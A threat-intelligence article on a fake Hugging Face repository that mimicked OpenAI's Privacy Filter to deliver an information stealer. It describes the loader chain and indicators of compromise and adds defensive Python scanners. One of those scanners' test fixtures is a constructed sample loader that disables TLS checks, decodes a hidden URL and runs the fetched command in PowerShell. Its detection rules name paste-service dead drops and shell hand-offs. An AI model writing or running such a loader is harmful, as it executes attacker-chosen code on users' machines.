The fundamental value proposition of any software marketplace is trust. Developers, researchers, enterprise teams, and organizations building on technologies from OpenAI use platforms like Hugging Face because they expect that trending, highly-downloaded repositories represent legitimate, community-validated resources. That trust assumption is now being systematically exploited, and the speed at which a malicious repository can accumulate download volume before detection is a number that every enterprise security and AI governance team needs to internalize.
A fraudulent Hugging Face repository impersonating OpenAI’s Privacy Filter model reached the number one trending position on the platform and accumulated approximately 244,000 downloads and 667 likes within 18 hours of activity. The download count was almost certainly artificially inflated to manufacture the appearance of community legitimacy. The technique worked. Users who relied on the standard platform trust signals (trending position, high download count, community engagement metrics) downloaded an information stealer packaged as a privacy tool.
Hugging Face has since disabled access to the malicious repository. The damage from 244,000 download events, even accounting for significant artificial inflation of that figure, is not undone by disabling a repository after the fact.
How the Attack Was Constructed and Why It Was Effective
The technical construction of this campaign reflects a level of operational sophistication that goes well beyond opportunistic typosquatting. Understanding the attack chain in detail matters for enterprise security teams designing detection and prevention controls around AI model supply chain risk.
The malicious repository, named Open-OSS/privacy-filter, copied the entire model card description from OpenAI’s legitimate openai/privacy-filter release verbatim. Casual inspection of the repository page would reveal no meaningful difference from the authentic version. The typosquat was in the account namespace, not the repository name, a distinction that requires deliberate attention to catch and that most developer workflows do not enforce at the point of cloning.
The infection mechanism was embedded in a loader.py file that presented as routine dependency configuration. On Windows, users were directed to run a batch script. The Python script, once executed, initiated a multi-stage infection chain designed with evasion at every layer.
The Technical Evasion Architecture
The loader script disabled SSL verification, decoded a Base64-encoded URL hosted on a public JSON paste service called JSON Keeper, and used that URL to retrieve a PowerShell command for execution. The use of JSON Keeper as a dead drop resolver is a specific evasion technique that deserves attention: by hosting the payload pointer on a legitimate public service rather than attacker-controlled infrastructure, the attackers could switch payloads dynamically without modifying the repository, and could bypass network controls that block known malicious domains while allowing traffic to legitimate paste services.
The PowerShell command reached out to a remote server at api.eth-fastscan[.]org to download a second-stage batch script that elevated privileges through a UAC prompt, configured Microsoft Defender Antivirus exclusions, downloaded the final payload, and established a scheduled task for SYSTEM-context execution. The scheduled task destroyed itself before any reboot, making the infection mechanism a one-shot launcher that leaves minimal persistence artifacts for forensic recovery.
The final payload was a Rust-based information stealer targeting Discord accounts, cryptocurrency wallets and browser extensions, system metadata, FileZilla configurations, wallet seed phrases, and browser data across Chromium and Gecko-based browsers. Anti-debugging, sandbox detection, virtual machine checks, and active attempts to disable Windows Antimalware Scan Interface and Event Tracing for Windows were embedded throughout the execution chain.
The result is a campaign in which the initial infection vector (a trusted AI model platform), the evasion architecture, and the payload delivery mechanism were all engineered to defeat the standard detection layers enterprise security teams rely on.
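As an added example (not code from the article or from HiddenLayer's research), a line-based scanner that flags the loader-script traits described in this section: TLS verification switched off, an encoded pointer decoded at run time, a public paste service used as a dead drop, and a hand-off to PowerShell or a batch file. The rule names, weights, thresholds and both sample scripts are constructed for illustration; the paste-service hostnames are assumptions.

```python
import re
from typing import Dict, List, Tuple

# Each rule: (name, pattern, weight). Weights and the verdict thresholds below are
# assumptions for this example, not values from the research.
RULES: List[Tuple[str, "re.Pattern", int]] = [
    ("tls_verification_disabled",
     re.compile(r"verify\s*=\s*False|_create_unverified_context|check_hostname\s*=\s*False"), 3),
    ("runtime_base64_decode", re.compile(r"base64\.(b64|urlsafe_b64)decode\s*\("), 2),
    # Assumed hostnames for common paste services used as dead-drop resolvers.
    ("paste_service_dead_drop", re.compile(r"jsonkeeper|pastebin\.com|paste\.ee", re.I), 3),
    ("shell_handoff",
     re.compile(r"(subprocess\.(run|Popen|call)|os\.system)\s*\(.*(powershell|cmd\.exe|\.bat)", re.I), 3),
]

def scan_loader(source: str) -> Dict[str, object]:
    """Scan one script's text line by line; return triggered rules, a score and a verdict."""
    findings: List[Tuple[int, str]] = []
    triggered = set()
    for lineno, line in enumerate(source.splitlines(), start=1):
        for name, pattern, weight in RULES:
            if pattern.search(line):
                findings.append((lineno, name))
                triggered.add((name, weight))
    score = sum(weight for _, weight in triggered)  # each rule counts once per script
    verdict = "block" if score >= 5 else "review" if score > 0 else "clean"
    return {"findings": findings, "score": score, "verdict": verdict}

# Constructed sample with the traits above; the Base64 string decodes to an example.com placeholder.
SAMPLE_LOADER = """\
import base64, requests, subprocess
session = requests.Session()
session.verify = False
pointer = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmNvbS9wb2ludGVy").decode()
command = session.get(pointer).text
subprocess.run(["powershell", "-Command", command])
"""

# Constructed benign configuration helper that should not trigger any rule.
BENIGN_LOADER = """\
import json
from pathlib import Path
config = json.loads(Path("config.json").read_text())
print(config["model_name"])
"""

if __name__ == "__main__":
    print(scan_loader(SAMPLE_LOADER))   # expected verdict: block
    print(scan_loader(BENIGN_LOADER))   # expected verdict: clean
```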
Six Additional Repositories and a Broader Campaign Infrastructure
HiddenLayer’s investigation uncovered six additional repositories operating with similar Python loader mechanisms to deploy the same stealer, all attributed to an account named anthfu. The repositories presented as model releases for Bonsai, Qwen, DeepSeek, and other AI model families that carry significant brand recognition in the AI development community.
The shared infrastructure across these repositories, specifically the api.eth-fastscan[.]org domain, connects to a separate campaign involving a malicious npm package named trevlo that was downloaded more than 2,300 times before removal. That package delivered ValleyRAT, also known as Winos 4.0, a modular remote access trojan with persistent attribution to Silver Fox, a Chinese threat actor group.
ValleyRAT’s typical distribution vectors have been phishing and search engine optimization poisoning. The use of npm and Hugging Face repositories as delivery mechanisms represents a documented expansion of this threat actor’s initial access playbook into open-source software supply chain territory. HiddenLayer’s assessment that the shared infrastructure suggests a broader coordinated supply chain operation targeting open-source ecosystems is significant because it reframes this campaign from an isolated typosquatting event to a sustained, multi-platform supply chain attack with nation-state adjacent attribution.
For enterprise threat intelligence programs, the infrastructure overlap between the Hugging Face campaign and the trevlo npm campaign provides a network of indicators of compromise that should be run against internal telemetry immediately.
Why AI Model Repositories Have Become a Priority Supply Chain Attack Surface
The Hugging Face campaign exploits a specific gap in how enterprise security programs have evolved in response to supply chain risk. Most mature enterprise security organizations have implemented software composition analysis tooling, dependency scanning for application code, and controls around npm, PyPI, and similar package registries. Those controls were built in response to well-documented supply chain attack campaigns targeting traditional software development pipelines.
AI model repositories represent a newer and currently less governed attack surface. Enterprise teams consuming models from Hugging Face are frequently applying lighter due diligence than they would apply to a third-party code dependency, treating model files as data artifacts rather than executable supply chain components. That distinction is incorrect in practice. The loader scripts, configuration files, and execution instructions that accompany AI model releases are code, and they carry the same supply chain risk profile as any other third-party software component.
The privacy irony embedded in this specific campaign is worth noting. OpenAI’s Privacy Filter was released as a tool to detect and redact personally identifiable information in unstructured text, designed to help enterprises build privacy protections into AI applications. The malicious version impersonating it delivered an information stealer that harvested exactly the kind of sensitive data the legitimate tool was designed to protect. Enterprise teams evaluating AI privacy tooling, a category that carries inherent credibility in compliance-focused organizations, are precisely the population most likely to be deceived by a high-fidelity impersonation of a trusted release in that category.
The Platform Trust Metric Problem
The manufactured social proof dimension of this campaign deserves specific attention from enterprise AI procurement and governance teams.
Trending position and download counts are the primary trust signals that most platforms, including Hugging Face, surface to users evaluating whether a repository is legitimate. The artificial inflation of these metrics to 244,000 downloads and 667 likes within 18 hours was not a peripheral detail of the attack. It was the core deception mechanism. Users who would have applied appropriate skepticism to an unknown repository with minimal downloads applied significantly less scrutiny to what appeared to be a massively popular community resource.
This creates a structural problem for enterprises using platform popularity metrics as any component of their AI model evaluation process. Automated inflation of download counts and engagement metrics is a known, documented technique in software supply chain attacks. Any security or procurement process that treats these figures as a credibility signal without independent verification is vulnerable to exactly this class of manipulation.
Enterprise AI governance programs should explicitly remove platform popularity metrics from their model evaluation criteria and replace them with verification steps that are resistant to artificial inflation: confirmed organizational ownership of the publishing account, cryptographic verification of model integrity against known-good checksums, network behavior analysis of any execution scripts accompanying the model, and sandbox testing of the full execution environment before deployment to developer endpoints.
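An added example (not the article's or HiddenLayer's code) of two of the inflation-resistant checks listed above: a publisher-namespace gate that also recognizes a copy of an official release under a different account, and a streamed SHA-256 comparison against a pinned checksum. The allowlist, the official-release table and the sample artifact bytes are constructed for this example; the pinned hash is SHA-256 of the constructed bytes.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Optional, Tuple

# Assumed allowlist of publisher namespaces the organization has confirmed, and a table of
# official release names mapped to their real namespace so lookalike copies are named explicitly.
TRUSTED_NAMESPACES = {"openai"}
OFFICIAL_RELEASES = {"privacy-filter": "openai"}

def check_repo_source(repo_id: str) -> Tuple[bool, str]:
    """Gate a Hugging Face repo id ('namespace/name') before anything is downloaded."""
    if repo_id.count("/") != 1:
        return False, "malformed repo id"
    namespace, name = repo_id.split("/")
    if namespace in TRUSTED_NAMESPACES:
        return True, "publisher namespace is on the allowlist"
    official = OFFICIAL_RELEASES.get(name.lower())
    if official and official != namespace:
        # Same repo name as an official release, different account: the namespace-level typosquat.
        return False, f"repo name matches official {official}/{name} but publisher is {namespace}"
    return False, "publisher namespace not on the allowlist"

def verify_checksum(path: Path, expected_sha256: str) -> bool:
    """Compare a downloaded artifact against a pinned SHA-256, streamed so large model files fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest() == expected_sha256.lower()

def demo_checksum(tmp_dir: Optional[Path] = None) -> Tuple[bool, bool]:
    """Constructed demo: an artifact whose pinned hash is SHA-256(b'abc'), then a tampered copy."""
    directory = Path(tmp_dir or tempfile.mkdtemp())
    pinned = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad"
    good, bad = directory / "model.bin", directory / "model_tampered.bin"
    good.write_bytes(b"abc")
    bad.write_bytes(b"abd")
    return verify_checksum(good, pinned), verify_checksum(bad, pinned)

if __name__ == "__main__":
    print(check_repo_source("Open-OSS/privacy-filter"))  # rejected: lookalike of openai/privacy-filter
    print(check_repo_source("openai/privacy-filter"))    # accepted
    print(demo_checksum())                               # (True, False)
```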
Indicators of Compromise and Immediate Response Priorities
Security and threat intelligence teams should act on the following indicators documented in the HiddenLayer research:
The domain api.eth-fastscan[.]org served both the Hugging Face stealer payload and a separate executable beaconing to welovechinatown[.]info, the C2 infrastructure associated with the Silver Fox ValleyRAT campaign.
Any telemetry showing a connection to either of these domains should be investigated immediately.
The recargapopular[.]com domain receives exfiltrated data from infected systems in JSON format. Any outbound connection to this domain from corporate endpoints should be treated as a confirmed indicator of infection.
The six repositories published under the anthfu account on Hugging Face carry potentially unsafe downloads; security teams should check for them in the dependency inventories of their AI development environments.
The trevlo npm package and its associated execution chain, including the CodeRun102.exe Winos 4.0 stager, provide additional indicators for teams with Node.js development environments.
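An added example (not code from the article or HiddenLayer) of running the indicators above against telemetry: the domains stay defanged in the list and are refanged only in memory, the matcher also catches subdomains without matching unrelated names that merely contain the string, and the stager file name is checked in process-creation lines. The log lines are constructed for this example and are not real telemetry.

```python
import re
from typing import Dict, List

# Indicators quoted from the article, kept defanged so the list is safe to paste into tickets.
DEFANGED_INDICATORS = {
    "api.eth-fastscan[.]org": "stealer payload host shared with the trevlo npm campaign",
    "welovechinatown[.]info": "Silver Fox ValleyRAT C2",
    "recargapopular[.]com": "stealer exfiltration endpoint (JSON)",
}
SUSPICIOUS_FILENAMES = {"CodeRun102.exe": "Winos 4.0 stager from the trevlo npm package"}

def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".").replace("hxxp", "http")

def build_domain_matcher() -> "re.Pattern":
    # Whole-token match of the domain or any subdomain; lookarounds stop 'notrecargapopular.com'.
    alts = "|".join(re.escape(refang(d)) for d in DEFANGED_INDICATORS)
    return re.compile(rf"(?<![\w.-])(?:[\w-]+\.)*(?:{alts})(?![\w-])", re.I)

_DOMAIN_RE = build_domain_matcher()

def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per log line that touches a listed domain (or subdomain) or file name."""
    hits: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        match = _DOMAIN_RE.search(line)
        if match:
            base = next(d for d in DEFANGED_INDICATORS if match.group(0).lower().endswith(refang(d)))
            hits.append({"line": number, "indicator": base, "context": DEFANGED_INDICATORS[base]})
            continue
        for filename, why in SUSPICIOUS_FILENAMES.items():
            if filename.lower() in line.lower():
                hits.append({"line": number, "indicator": filename, "context": why})
                break
    return hits

# Constructed DNS, proxy and EDR lines for this example (timestamps and hostnames are made up).
SAMPLE_LOGS = [
    "2000-01-01T10:00:01Z dns host=dev-laptop-17 qname=api.eth-fastscan.org type=A",
    "2000-01-01T10:00:02Z proxy host=dev-laptop-17 url=https://huggingface.co/openai/privacy-filter status=200",
    "2000-01-01T10:00:05Z proxy host=dev-laptop-17 url=https://cdn.welovechinatown.info/u status=200",
    "2000-01-01T10:00:09Z edr host=dev-laptop-17 process=C:\\Users\\dev\\AppData\\Local\\Temp\\CodeRun102.exe",
    "2000-01-01T10:00:12Z proxy host=dev-laptop-17 url=https://notrecargapopular.com/ status=200",
]

if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(hit)  # expected hits on lines 1, 3 and 4 only
```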
For organizations that cannot confirm whether developer endpoints connected to any of the affected repositories during the exposure window, credential rotation for accounts accessible from those endpoints is the appropriate immediate response. The stealer’s targeting of browser-stored credentials, cryptocurrency wallets, and Discord accounts means the personal and professional account separation of affected developers becomes a relevant secondary risk surface.
The Enterprise AI Governance Gap This Campaign Exposes
The broader implication of the Hugging Face campaign for enterprise security leadership extends beyond this specific incident. It documents the arrival of sophisticated, nation-state adjacent threat actors in the AI model supply chain, operating with evasion techniques and infrastructure specifically engineered for this attack surface.
Enterprise organizations that have deployed AI development programs without extending their supply chain security governance to cover AI model repositories are carrying a gap that this campaign has now proven is actively exploited. The remediation is not technically complex, but it requires deliberate program design decisions that most AI governance frameworks have not yet incorporated.
Verification requirements for AI model downloads, mandatory sandbox analysis of any execution scripts accompanying model files, network monitoring for connections to AI model platform domains from developer endpoints, and removal of platform popularity metrics as trust signals are the foundational controls this campaign argues for. None of them require new tooling investment. They require policy decisions and enforcement within existing security program infrastructure.
The organizations that treat this campaign as an isolated incident rather than a category signal will encounter the next iteration of this attack surface without the controls to detect or prevent it. The organizations that treat it as evidence that AI model supply chain governance requires the same maturity as traditional software supply chain security will be structurally better positioned when that next campaign arrives.
Research and Intelligence Sources: HiddenLayer